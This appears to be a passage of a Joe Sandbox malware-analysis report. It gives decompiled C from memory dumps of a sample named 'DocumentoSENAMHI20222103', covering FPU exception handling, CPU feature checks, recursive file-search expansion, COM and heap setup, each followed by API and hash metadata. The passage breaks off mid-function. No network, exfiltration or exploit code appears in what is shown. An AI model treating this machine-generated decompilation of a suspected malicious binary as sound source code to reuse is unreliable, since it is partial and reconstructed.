    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
    				}
    				if((_t260 & 0x00000010) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
    				}
    				if((_t260 & 0x00000020) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
    				}
    				_t172 =  *_t266 & 0x00000c00;
    				if(_t172 == 0) {
    					 *_a4 =  *_a4 & 0xfffffffc;
    				} else {
    					if(_t172 == 0x400) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffd | 1;
    						L26:
    						 *_t258 = _t226;
    						L29:
    						_t175 =  *_t266 & 0x00000300;
    						if(_t175 == 0) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
    							L35:
    							 *_t251 = _t178;
    							L36:
    							_t179 = _a4;
    							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
    							if(_a28 == 0) {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
    								 *((long long*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t255 = _a4;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
    								 *(_a4 + 0x50) =  *_t241;
    							} else {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
    								 *(_a4 + 0x50) =  *_t241;
    							}
    							E0015DFDB(_t255);
    							RaiseException(_t263, 0, 1,  &_a4);
    							_t257 = _a4;
    							_t193 = _t257[2];
    							if((_t193 & 0x00000010) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffe;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000008) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffb;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000004) != 0) {
    								 *_t266 =  *_t266 & 0xfffffff7;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000002) != 0) {
    								 *_t266 =  *_t266 & 0xffffffef;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000001) != 0) {
    								 *_t266 =  *_t266 & 0xffffffdf;
    							}
    							_t196 =  *_t257 & 0x00000003;
    							if(_t196 == 0) {
    								 *_t266 =  *_t266 & 0xfffff3ff;
    							} else {
    								_t207 = _t196 - 1;
    								if(_t207 == 0) {
    									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
    									L55:
    									 *_t266 = _t210;
    									L58:
    									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
    									if(_t200 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
    										L64:
    										 *_t266 = _t203;
    										L65:
    										if(_a28 == 0) {
    											 *_t241 = _t257[0x14];
    										} else {
    											 *_t241 = _t257[0x14];
    										}
    										return _t203;
    									}
    									_t204 = _t200 - 1;
    									if(_t204 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
    										goto L64;
    									}
    									_t203 = _t204 - 1;
    									if(_t203 == 0) {
    										 *_t266 =  *_t266 & 0xfffff3ff;
    									}
    									goto L65;
    								}
    								_t211 = _t207 - 1;
    								if(_t211 == 0) {
    									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
    									goto L55;
    								}
    								if(_t211 == 1) {
    									 *_t266 =  *_t266 | 0x00000c00;
    								}
    							}
    							goto L58;
    						}
    						if(_t175 == 0x200) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
    							goto L35;
    						}
    						if(_t175 == 0x300) {
    							 *_a4 =  *_a4 & 0xffffffe3;
    						}
    						goto L36;
    					}
    					if(_t172 == 0x800) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
    						goto L26;
    					}
    					if(_t172 == 0xc00) {
    						 *_a4 =  *_a4 | 0x00000003;
    					}
    				}
    			}

    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0015FA97,?,?,00000008,?,?,0015F72F,00000000), ref: 0015FCC9
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: 808dd107b3cb3e40f3bd60ae8035366d3b062ee3f12c22581ac2cd413ae17787
    • Instruction ID: dbe3df36ffd63a009fb15a67257469a8dbbd8174370c98206f2ea7b669e4b9a5
    • Opcode Fuzzy Hash: 808dd107b3cb3e40f3bd60ae8035366d3b062ee3f12c22581ac2cd413ae17787
    • Instruction Fuzzy Hash: 37B13931610609CFD719CF28C496B657BA0FF45366F25866CECA9CF2A1C335E986CB40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00154775(signed int __edx) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr _t60;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				signed int _t66;
    				signed int _t67;
    				signed int _t73;
    				intOrPtr _t74;
    				intOrPtr _t75;
    				intOrPtr* _t77;
    				signed int _t78;
    				intOrPtr* _t82;
    				signed int _t85;
    				signed int _t90;
    				intOrPtr* _t93;
    				signed int _t96;
    				signed int _t99;
    				signed int _t104;
    
    				_t90 = __edx;
    				 *0x292724 =  *0x292724 & 0x00000000;
    				 *0x169010 =  *0x169010 | 0x00000001;
    				if(IsProcessorFeaturePresent(0xa) == 0) {
    					L23:
    					return 0;
    				}
    				_v20 = _v20 & 0x00000000;
    				_push(_t74);
    				_t93 =  &_v40;
    				asm("cpuid");
    				_t75 = _t74;
    				 *_t93 = 0;
    				 *((intOrPtr*)(_t93 + 4)) = _t74;
    				 *((intOrPtr*)(_t93 + 8)) = 0;
    				 *(_t93 + 0xc) = _t90;
    				_v16 = _v40;
    				_v8 = _v28 ^ 0x49656e69;
    				_v12 = _v32 ^ 0x6c65746e;
    				_push(_t75);
    				asm("cpuid");
    				_t77 =  &_v40;
    				 *_t77 = 1;
    				 *((intOrPtr*)(_t77 + 4)) = _t75;
    				 *((intOrPtr*)(_t77 + 8)) = 0;
    				 *(_t77 + 0xc) = _t90;
    				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
    					L9:
    					_t96 =  *0x292728; // 0x2
    					L10:
    					_t85 = _v32;
    					_t60 = 7;
    					_v8 = _t85;
    					if(_v16 < _t60) {
    						_t78 = _v20;
    					} else {
    						_push(_t77);
    						asm("cpuid");
    						_t82 =  &_v40;
    						 *_t82 = _t60;
    						 *((intOrPtr*)(_t82 + 4)) = _t77;
    						 *((intOrPtr*)(_t82 + 8)) = 0;
    						_t85 = _v8;
    						 *(_t82 + 0xc) = _t90;
    						_t78 = _v36;
    						if((_t78 & 0x00000200) != 0) {
    							 *0x292728 = _t96 | 0x00000002;
    						}
    					}
    					_t61 =  *0x169010; // 0x6f
    					_t62 = _t61 | 0x00000002;
    					 *0x292724 = 1;
    					 *0x169010 = _t62;
    					if((_t85 & 0x00100000) != 0) {
    						_t63 = _t62 | 0x00000004;
    						 *0x292724 = 2;
    						 *0x169010 = _t63;
    						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
    							asm("xgetbv");
    							_v24 = _t63;
    							_v20 = _t90;
    							_t104 = 6;
    							if((_v24 & _t104) == _t104) {
    								_t66 =  *0x169010; // 0x6f
    								_t67 = _t66 | 0x00000008;
    								 *0x292724 = 3;
    								 *0x169010 = _t67;
    								if((_t78 & 0x00000020) != 0) {
    									 *0x292724 = 5;
    									 *0x169010 = _t67 | 0x00000020;
    									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
    										 *0x169010 =  *0x169010 | 0x00000040;
    										 *0x292724 = _t104;
    									}
    								}
    							}
    						}
    					}
    					goto L23;
    				}
    				_t73 = _v40 & 0x0fff3ff0;
    				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
    					_t99 =  *0x292728; // 0x2
    					_t96 = _t99 | 0x00000001;
    					 *0x292728 = _t96;
    					goto L10;
    				} else {
    					goto L9;
    				}
    			}

    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0015478B
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: 1a6477c8f2ee4bf6800d6d58098421d802e8d79b15b650ffbcf28955caf3395a
    • Instruction ID: 30ccf5a7ce4e2646fa42eaf6a9c5f0e3d24840e6f71dd3c1d3b6b9f084c6a526
    • Opcode Fuzzy Hash: 1a6477c8f2ee4bf6800d6d58098421d802e8d79b15b650ffbcf28955caf3395a
    • Instruction Fuzzy Hash: E65183B1901205DFDB19CF94EC957AEBBF4FB48359F14842AD861EB350D3B49988CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0015A22B(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
    				signed int _v8;
    				signed int _v12;
    				union _FINDEX_INFO_LEVELS _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				struct _WIN32_FIND_DATAW _v604;
    				char _v605;
    				intOrPtr* _v612;
    				union _FINDEX_INFO_LEVELS _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				signed int _v628;
    				union _FINDEX_INFO_LEVELS _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				signed int _v640;
    				signed int _v644;
    				union _FINDEX_INFO_LEVELS _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				signed int _v664;
    				union _FINDEX_INFO_LEVELS _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t68;
    				signed int _t73;
    				signed int _t75;
    				char _t77;
    				signed char _t78;
    				signed int _t84;
    				signed int _t94;
    				signed int _t97;
    				union _FINDEX_INFO_LEVELS _t98;
    				union _FINDEX_INFO_LEVELS _t100;
    				intOrPtr* _t106;
    				signed int _t109;
    				intOrPtr _t116;
    				signed int _t118;
    				signed int _t121;
    				signed int _t123;
    				void* _t126;
    				union _FINDEX_INFO_LEVELS _t127;
    				void* _t128;
    				intOrPtr* _t130;
    				intOrPtr* _t133;
    				signed int _t135;
    				intOrPtr* _t138;
    				signed int _t143;
    				signed int _t149;
    				void* _t155;
    				signed int _t158;
    				intOrPtr _t160;
    				void* _t161;
    				void* _t165;
    				void* _t166;
    				signed int _t167;
    				signed int _t170;
    				void* _t171;
    				signed int _t172;
    				void* _t173;
    				void* _t174;
    
    				_push(__ecx);
    				_t133 = _a4;
    				_t2 = _t133 + 1; // 0x1
    				_t155 = _t2;
    				do {
    					_t68 =  *_t133;
    					_t133 = _t133 + 1;
    				} while (_t68 != 0);
    				_t158 = _a12;
    				_t135 = _t133 - _t155 + 1;
    				_v8 = _t135;
    				if(_t135 <=  !_t158) {
    					_push(__esi);
    					_t5 = _t158 + 1; // 0x1
    					_t126 = _t5 + _t135;
    					_t165 = E00159E27(_t126, 1);
    					__eflags = _t158;
    					if(_t158 == 0) {
    						L7:
    						_push(_v8);
    						_t126 = _t126 - _t158;
    						_t73 = E0015CB84(_t165 + _t158, _t126, _a4);
    						_t172 = _t171 + 0x10;
    						__eflags = _t73;
    						if(_t73 != 0) {
    							goto L12;
    						} else {
    							_t130 = _a16;
    							_t118 = E0015A626(_t130);
    							_v8 = _t118;
    							__eflags = _t118;
    							if(_t118 == 0) {
    								 *( *(_t130 + 4)) = _t165;
    								_t167 = 0;
    								_t14 = _t130 + 4;
    								 *_t14 =  *(_t130 + 4) + 4;
    								__eflags =  *_t14;
    							} else {
    								E00158B82(_t165);
    								_t167 = _v8;
    							}
    							E00158B82(0);
    							_t121 = _t167;
    							goto L4;
    						}
    					} else {
    						_push(_t158);
    						_t123 = E0015CB84(_t165, _t126, _a8);
    						_t172 = _t171 + 0x10;
    						__eflags = _t123;
    						if(_t123 != 0) {
    							L12:
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(0);
    							E0015749C();
    							asm("int3");
    							_t170 = _t172;
    							_t173 = _t172 - 0x298;
    							_t75 =  *0x169008; // 0x26a91022
    							_v48 = _t75 ^ _t170;
    							_t138 = _v32;
    							_t156 = _v28;
    							_push(_t126);
    							_push(0);
    							_t160 = _v36;
    							_v648 = _t156;
    							__eflags = _t138 - _t160;
    							if(_t138 != _t160) {
    								while(1) {
    									_t116 =  *_t138;
    									__eflags = _t116 - 0x2f;
    									if(_t116 == 0x2f) {
    										break;
    									}
    									__eflags = _t116 - 0x5c;
    									if(_t116 != 0x5c) {
    										__eflags = _t116 - 0x3a;
    										if(_t116 != 0x3a) {
    											_t138 = E0015D0C0(_t160, _t138);
    											__eflags = _t138 - _t160;
    											if(_t138 != _t160) {
    												continue;
    											}
    										}
    									}
    									break;
    								}
    								_t156 = _v612;
    							}
    							_t77 =  *_t138;
    							_v605 = _t77;
    							__eflags = _t77 - 0x3a;
    							if(_t77 != 0x3a) {
    								L23:
    								_t127 = 0;
    								__eflags = _t77 - 0x2f;
    								if(__eflags == 0) {
    									L26:
    									_t78 = 1;
    								} else {
    									__eflags = _t77 - 0x5c;
    									if(__eflags == 0) {
    										goto L26;
    									} else {
    										__eflags = _t77 - 0x3a;
    										_t78 = 0;
    										if(__eflags == 0) {
    											goto L26;
    										}
    									}
    								}
    								_v672 = _t127;
    								_v668 = _t127;
    								_push(_t165);
    								asm("sbb eax, eax");
    								_v664 = _t127;
    								_v660 = _t127;
    								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
    								_v656 = _t127;
    								_v652 = _t127;
    								_t84 = E0015A01F(_t138 - _t160 + 1, _t160,  &_v672, E0015A533(_t156, __eflags));
    								_t174 = _t173 + 0xc;
    								asm("sbb eax, eax");
    								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
    								__eflags = _t166 - 0xffffffff;
    								if(_t166 != 0xffffffff) {
    									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
    									__eflags = _t143;
    									_t144 = _t143 >> 2;
    									_v644 = _t143 >> 2;
    									do {
    										_v636 = _t127;
    										_v632 = _t127;
    										_v628 = _t127;
    										_v624 = _t127;
    										_v620 = _t127;
    										_v616 = _t127;
    										_t94 = E00159F50( &(_v604.cFileName),  &_v636,  &_v605, E0015A533(_t156, __eflags));
    										_t174 = _t174 + 0x10;
    										asm("sbb eax, eax");
    										_t97 =  !( ~_t94) & _v628;
    										__eflags =  *_t97 - 0x2e;
    										if( *_t97 != 0x2e) {
    											L34:
    											_push(_v612);
    											_t98 = E0015A22B(_t144, _t166, _t97, _t160, _v640);
    											_t174 = _t174 + 0x10;
    											_v648 = _t98;
    											__eflags = _t98;
    											if(_t98 != 0) {
    												__eflags = _v616 - _t127;
    												if(_v616 != _t127) {
    													E00158B82(_v628);
    													_t98 = _v648;
    												}
    												_t127 = _t98;
    											} else {
    												goto L35;
    											}
    										} else {
    											_t144 =  *((intOrPtr*)(_t97 + 1));
    											__eflags = _t144;
    											if(_t144 == 0) {
    												goto L35;
    											} else {
    												__eflags = _t144 - 0x2e;
    												if(_t144 != 0x2e) {
    													goto L34;
    												} else {
    													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
    													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
    														goto L35;
    													} else {
    														goto L34;
    													}
    												}
    											}
    										}
    										L43:
    										FindClose(_t166);
    										goto L44;
    										L35:
    										__eflags = _v616 - _t127;
    										if(_v616 != _t127) {
    											E00158B82(_v628);
    											_pop(_t144);
    										}
    										__eflags = FindNextFileW(_t166,  &_v604);
    									} while (__eflags != 0);
    									_t106 = _v612;
    									_t149 = _v644;
    									_t156 =  *_t106;
    									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
    									__eflags = _t149 - _t109;
    									if(_t149 != _t109) {
    										E0015CB90(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00159E84);
    									}
    									goto L43;
    								} else {
    									_push(_v612);
    									_t127 = E0015A22B( &_v604, _t166, _t160, _t127, _t127);
    								}
    								L44:
    								__eflags = _v652;
    								_pop(_t165);
    								if(_v652 != 0) {
    									E00158B82(_v664);
    								}
    								_t100 = _t127;
    							} else {
    								__eflags = _t138 - _t160 + 1;
    								if(_t138 == _t160 + 1) {
    									_t77 = _v605;
    									goto L23;
    								} else {
    									_push(_t156);
    									_t100 = E0015A22B(_t138, _t165, _t160, 0, 0);
    								}
    							}
    							_pop(_t161);
    							__eflags = _v12 ^ _t170;
    							_pop(_t128);
    							return E0015403C(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
    						} else {
    							goto L7;
    						}
    					}
    				} else {
    					_t121 = 0xc;
    					L4:
    					return _t121;
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9b46f1840bcb590f617a010ad8139ec99772118c6ab07a54a53abf287b20936a
    • Instruction ID: 5fac1ee5d70babc128e05b10690143c7c69ccc41d37174360e2e4d1afb369af8
    • Opcode Fuzzy Hash: 9b46f1840bcb590f617a010ad8139ec99772118c6ab07a54a53abf287b20936a
    • Instruction Fuzzy Hash: D241B471844218EEDF20DF69CC89AEABBB8EF55305F5442D9E81DD7201DB319E888F10
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E001514A2(void* __ecx, intOrPtr* _a4) {
    				void* _t4;
    				intOrPtr* _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t14;
    				void* _t17;
    
    				_t8 = _a4;
    				if(_t8 != 0) {
    					_t17 = 0;
    					_t14 = __ecx + 0x28;
    					if( *_t14 != 0) {
    						L4:
    						 *_t8 =  *_t14;
    						_t11 =  *_t14;
    						 *((intOrPtr*)( *_t11 + 4))(_t11);
    						L5:
    						return _t17;
    					}
    					__imp__CoCreateInstance(0x1612d0, 0, 1, 0x166250, _t14);
    					_t17 = _t4;
    					if(_t17 < 0) {
    						goto L5;
    					}
    					goto L4;
    				}
    				return 0x80004003;
    			}

    APIs
    • CoCreateInstance.OLE32(001612D0,00000000,00000001,00166250,?), ref: 001514CD
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: 2dd4ace8e0d20d4d615d82438b9a0ff1f15b6ed2e92d593513e7e4aba4ec2655
    • Instruction ID: 87fe596ca6fcabccf542fa713178813753d0e8ba77e14b3cd45e8999555e3270
    • Opcode Fuzzy Hash: 2dd4ace8e0d20d4d615d82438b9a0ff1f15b6ed2e92d593513e7e4aba4ec2655
    • Instruction Fuzzy Hash: F1F08276204221FBC7218F46DC94E86FB6CEF95B617104229FE09EF240C7709C54C6E5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0015B2B8() {
    				signed int _t3;
    
    				_t3 = GetProcessHeap();
    				 *0x292dc0 = _t3;
    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
    			}




    0x0015b2b8
    0x0015b2c0
    0x0015b2c8

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: f3e376d667f9f7e432872c3ff0a7b16e9b1b109545c2120edc99b0d444a728a5
    • Instruction ID: fef882c98899ae874d2c09fafd46329d58e16c5f7b5b2657be2c23209a305842
    • Opcode Fuzzy Hash: f3e376d667f9f7e432872c3ff0a7b16e9b1b109545c2120edc99b0d444a728a5
    • Instruction Fuzzy Hash: EFA01130202202EB83008F30BF082083BA8BA0028230800AAE008C0020EB2080808A20
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00159DF6(void* __ecx) {
    				char _v8;
    				intOrPtr _t7;
    				char _t13;
    
    				_t13 = 0;
    				_v8 = 0;
    				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
    				_t16 =  *((intOrPtr*)(_t7 + 8));
    				if( *((intOrPtr*)(_t7 + 8)) < 0) {
    					L2:
    					_t13 = 1;
    				} else {
    					E00159841(_t16,  &_v8);
    					if(_v8 != 1) {
    						goto L2;
    					}
    				}
    				return _t13;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
    • Instruction ID: 1a9f1e8cd6c3659881ed39914e29e4d611df54dbfd5eeb32f0973881e2cdcacd
    • Opcode Fuzzy Hash: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
    • Instruction Fuzzy Hash: 23E08C72911228EBCB14DB88C905D8AF3ECEB45B41B11049AF911D7200C370DE04C7D1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    C-Code - Quality: 81%
    			E001529E8(CHAR* __ebx, CHAR** __ecx, void* __edi, void* __esi, void* __eflags) {
    				CHAR** _t42;
    				void* _t45;
    				CHAR* _t47;
    				CHAR* _t48;
    				CHAR* _t53;
    				CHAR* _t61;
    				CHAR* _t62;
    				CHAR* _t63;
    				CHAR* _t64;
    				char _t66;
    				CHAR* _t67;
    				CHAR* _t68;
    				CHAR* _t69;
    				CHAR* _t73;
    				CHAR* _t74;
    				CHAR* _t75;
    				CHAR* _t76;
    				CHAR* _t77;
    				CHAR* _t78;
    				CHAR* _t79;
    				CHAR* _t84;
    				void* _t89;
    				CHAR* _t92;
    				char _t98;
    				CHAR** _t101;
    				CHAR* _t103;
    				void* _t104;
    				void* _t105;
    
    				_t80 = __ebx;
    				_push(0x40);
    				E00160216(0x1608c4, __ebx, __edi, __esi);
    				_t101 = __ecx;
    				_t103 =  *(_t104 + 8);
    				_t42 =  *(_t104 + 0xc);
    				 *(_t104 - 0x4c) = _t42;
    				if(_t103 != 0 && _t42 != 0) {
    					_t80 = 0;
    					 *_t42 = 0;
    					_t45 = E001574D0(_t103);
    					 *((intOrPtr*)(_t104 - 0x44)) = 0;
    					_t47 =  <  ? 0x3e8 : _t45 + _t45;
    					 *(_t104 - 0x40) = _t47;
    					__imp__CoTaskMemAlloc(_t47);
    					 *(_t104 - 0x3c) = _t47;
    					if(_t47 != 0) {
    						 *_t47 = 0;
    					}
    					 *(_t104 - 4) = _t80;
    					if(_t47 != 0) {
    						 *_t101 = _t103;
    						_t48 = _t80;
    						_t84 = _t80;
    						_t98 =  *0x292df8; // 0x0
    						 *((char*)(_t104 - 0x33)) = _t98;
    						 *(_t104 - 0x38) = _t48;
    						 *(_t104 - 0x32) = _t80;
    						 *(_t104 - 0x31) = _t84;
    						__eflags =  *_t103 - _t48;
    						if( *_t103 == _t48) {
    							L45:
    							 *(_t104 - 0x3c) = _t80;
    							 *( *(_t104 - 0x4c)) =  *(_t104 - 0x3c);
    						} else {
    							while(1) {
    								 *(_t104 - 0x48) = _t48;
    								__eflags = _t98 - 1;
    								if(_t98 != 1) {
    									goto L29;
    								}
    								__eflags = _t48;
    								if(_t48 != 0) {
    									L14:
    									_t64 =  *_t101;
    									__eflags =  *_t64 - 0x27;
    									if( *_t64 != 0x27) {
    										__eflags = _t84;
    										if(_t84 != 0) {
    											goto L29;
    										} else {
    											goto L22;
    										}
    									} else {
    										__eflags = _t84;
    										if(_t84 != 0) {
    											_t69 = CharNextA(_t64);
    											__eflags =  *_t69 - 0x27;
    											if( *_t69 == 0x27) {
    												_t103 = CharNextA( *_t101);
    												 *_t101 = _t103;
    												_t73 = E001518A6(_t104 - 0x44, _t103, CharNextA(_t103) - _t103);
    												__eflags = _t73;
    												if(_t73 == 0) {
    													goto L5;
    												} else {
    													goto L29;
    												}
    											} else {
    												 *(_t104 - 0x31) = _t80;
    												L22:
    												_t66 =  *( *_t101);
    												__eflags = _t66 - 0x7b;
    												if(_t66 != 0x7b) {
    													_t92 =  *(_t104 - 0x48);
    													 *(_t104 - 0x38) = _t92;
    													__eflags = _t66 - 0x7d;
    													if(_t66 != 0x7d) {
    														goto L29;
    													} else {
    														_t67 = _t92 - 1;
    														 *(_t104 - 0x38) = _t67;
    														__eflags = _t67;
    														if(_t67 != 0) {
